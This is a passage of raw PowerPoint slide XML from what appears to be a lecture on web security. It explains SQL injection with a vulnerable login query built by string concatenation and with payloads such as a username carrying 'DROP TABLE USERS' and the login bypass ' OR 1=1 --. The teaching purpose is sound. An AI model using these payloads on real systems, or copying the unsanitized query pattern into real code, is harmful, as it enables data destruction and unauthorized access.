            </a:r>
          </a:p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(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44038" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C681CC-42C0-F74C-9FA2-832B2363F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7901" y="2444750"/>
            <a:ext cx="1274763" cy="24066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44039" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FED98D4-F2C7-4F48-8A81-C34BE6D5C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764" y="3886200"/>
            <a:ext cx="1298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Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFEA5DEB-0784-2549-9823-7D7EFEAB2D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48100" y="4418013"/>
            <a:ext cx="1181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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AECE0B22-88D6-8D43-979F-74DBDDE97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334" y="2286001"/>
            <a:ext cx="204254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SELECT passwd </a:t>
            </a:r>
          </a:p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FROM USERS</a:t>
            </a:r>
          </a:p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WHERE uname </a:t>
            </a:r>
          </a:p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IS ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44042" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BE5C42-7C6F-544A-A04E-BA1154735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6" y="3886200"/>
            <a:ext cx="2212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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9408B0F5-37D1-684E-BB7E-51969975FE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5563" y="4381500"/>
            <a:ext cx="2119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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5FC9BC-0A5E-164D-9907-F6DC3179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95F580BB-B3C6-3E40-84E1-5701C0EB442C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27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429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8BA5443-0E18-D949-B42A-D8C38682F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Malicious User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45059" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A202AF5C-0AE7-BC42-A25D-23CA9FA15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68" b="70117"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2306639" y="1828800"/>
            <a:ext cx="65563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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BFDF9DB-DE2B-C346-B5E4-27040726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D998ADE6-3956-1045-B75C-768EB7D57147}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28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" name="Oval 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{656C1332-6A31-F84E-84CA-D0DABA168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33801"/>
            <a:ext cx="3429000" cy="792163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72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771F-7663-6746-B4F3-0E38C34F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98460-94F9-6842-BDB6-E4AAECF76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XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Server side web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325203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771F-7663-6746-B4F3-0E38C34F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98460-94F9-6842-BDB6-E4AAECF76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XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server side web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="502472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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62319B79-F85E-CF4A-BA0C-C1B46E5FF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333" y="2286001"/>
            <a:ext cx="140134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Enter </a:t>
            </a:r>
          </a:p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Username </a:t>
            </a:r>
          </a:p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&amp; </a:t>
            </a:r>
          </a:p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5397AFD-FF7D-324C-A229-741947EED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SQL Injection Attack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1D4D0CBF-843A-C74F-A8F1-2FEA229E6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701" y="2444750"/>
            <a:ext cx="1274763" cy="24066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Web</a:t>
            </a:r>
          </a:p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46085" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D98E04E-3DE5-8A48-8E38-BEA9252D2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2444750"/>
            <a:ext cx="1395413" cy="24066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Web </a:t>
            </a:r>
          </a:p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browser</a:t>
            </a:r>
          </a:p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(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46086" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C039C478-7981-7241-8FA9-04FFEBE29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7901" y="2444750"/>
            <a:ext cx="1274763" cy="24066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46087" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375BBFB8-3F18-D84D-B4D6-5695ECD853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4764" y="3886200"/>
            <a:ext cx="1298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Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5EE57D-6D7E-8246-802C-D5B42F59DD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48100" y="4418013"/>
            <a:ext cx="1181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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8F4790-AF83-754D-A150-DFE313AB2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99" y="1981200"/>
            <a:ext cx="241925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SELECT passwd </a:t>
            </a:r>
          </a:p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FROM USERS</a:t>
            </a:r>
          </a:p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WHERE uname </a:t>
            </a:r>
          </a:p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IS ‘’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP TABLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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USERS; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- ’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46090" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C614D90-34F9-364E-B9AA-7B62B633A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6" y="3886200"/>
            <a:ext cx="2212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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA77148F-57E3-EC4C-8652-8B85F4E006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5563" y="4381500"/>
            <a:ext cx="2119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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BEAFA3-2251-BD43-91AB-1BFE69A3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6E564680-A824-5A4E-9F34-4D68DE3CE4D1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30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9CA1CE-657F-034C-BF04-0E3B8C9B1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001963"/>
            <a:ext cx="2971800" cy="792162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DF37BD99-2F77-BD43-A3BE-DDEC1576D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1" y="3794125"/>
            <a:ext cx="449263" cy="12779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C1543615-9EB8-A14E-AC78-F64EC623C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968876"/>
            <a:ext cx="2692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Eliminates all user accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408387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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1EBA898-32A2-F04D-BCA2-A9CDB695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AAE6DEE3-5BC0-5C4A-ACD9-357389198740}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31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DB44401C-DECB-3647-BD6A-B3692AD3A6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Exploits of a Mom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23498960-3C27-E04D-8A02-F4ED15C4B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6" y="1066800"/>
            <a:ext cx="30638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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47109" name="Picture 6" descr="mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C09284-6A05-3A42-A0CB-0169CA622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2438400"/>
            <a:ext cx="8456612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5974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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C46BE54-BD0B-A944-AD6D-A61CCA6E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SQL Injection: Basic Idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48131" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220FB7F8-1843-FE44-9B74-532A14F39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4" y="2667000"/>
            <a:ext cx="1436687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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92098F1-1BFF-5E4C-9692-CC885DD23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38" y="4572001"/>
            <a:ext cx="1155700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4" descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB35E3C5-A2B7-4647-B008-2A270B54C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1" y="1905000"/>
            <a:ext cx="2436813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 Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8080202-8CC0-614E-9633-B96E705C5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3613" y="1524000"/>
            <a:ext cx="15599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/>
              <a:t>Victim server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF68847F-03B9-614F-82E1-583F0C5B2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13" y="6000750"/>
            <a:ext cx="16610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/>
              <a:t>Victim SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48136" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7245A2FA-3F09-E447-92E8-B323DA35EC8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51288" y="2257425"/>
            <a:ext cx="2830512" cy="61753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Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DF5283-B5A0-C84A-A0F1-6988297B0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913" y="2257425"/>
            <a:ext cx="10527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/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD7C6014-6AA4-F04F-BC32-556120484224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20890924">
            <a:off x="4200762" y="2070070"/>
            <a:ext cx="22426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/>
              <a:t>post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48139" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6D30BE-70CD-814C-A43F-A679C6E274A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708901" y="3651251"/>
            <a:ext cx="1801812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9" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3BE451-0E3E-4147-B23F-6DFB2C92B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1100" y="3482976"/>
            <a:ext cx="14859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sz="2000"/>
              <a:t>unintended query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9373E9E0-4B65-3E4F-9F85-A98384B81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776" y="3486150"/>
            <a:ext cx="2638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/>
              <a:t>receive data from DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48142" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5349A738-9946-7840-B55D-BC95E8502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9676" y="2378076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143" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9CDAC5-949C-CB4D-9078-7B7C47402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1" y="3090864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144" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AD155B-FD97-2644-9513-E71834656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539" y="3505201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354" name="Freeform 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEEA9C47-B3C3-C04C-A700-346C1E35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650" y="2773364"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 17033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00550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48146" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1E64CE-3594-6949-8167-C4C52896C8BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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643688D9-E55F-144E-9110-90074FBF9CC8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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32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81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E3605FF-D8AE-1B4C-8648-D2E773707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419600"/>
            <a:ext cx="6172200" cy="158115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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is an </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input validation vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Unsanitized user input in SQL query to back- end database changes the meaning of query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special case of command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000"/>
            </a:br>
            <a:endParaRPr kumimoji="1"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547846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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6E8206-DB06-E34D-8AE5-FDCD5D75D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657600"/>
            <a:ext cx="7848600" cy="83820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9155" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D4003C-2CCE-EB49-ABAA-838CCB7D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6E19F230-4A66-B941-830A-B70C47A5A954}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33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5597436A-BA64-A249-93AB-9B50B71D14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with Back-End DB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8CA79E78-43B4-0D45-BED1-C72D4E47D8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82000" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set UserFound=execute(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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        “SELECT * FROM UserTable WHERE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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username=‘ ”  &amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form(“user”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp; “ ′ AND   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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        password= ‘ ”  &amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form(“pwd”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp; “ ′ ” );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User supplies username and password, this SQL query checks if user/password combination is in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If not UserFound.EOF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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       Authentication correct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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   else Fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49158" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{473B60C2-228E-C349-ACD6-9CA71D64B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257801"/>
            <a:ext cx="3276600" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86921"/>
              <a:gd name="adj2" fmla="val -5381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Only true if the result of SQL query is not empty, i.e., user/pwd is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118816777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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DAC278D-C449-B243-8E0D-79C6208E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A93C4DEA-C1A8-F345-9AB5-69329C7D4F12}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34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8C7B5DC7-CD03-374E-86F2-C86EF49982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0400" y="228600"/>
            <a:ext cx="8432800" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Using SQL Injection to Log In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53858E29-DB08-7248-AE48-2DCFE4C16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82000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User gives username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>′ OR 1=1 --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Web server executes query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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   set UserFound=execute(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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * FROM UserTable WHERE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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … );</a:t>
            </a:r>
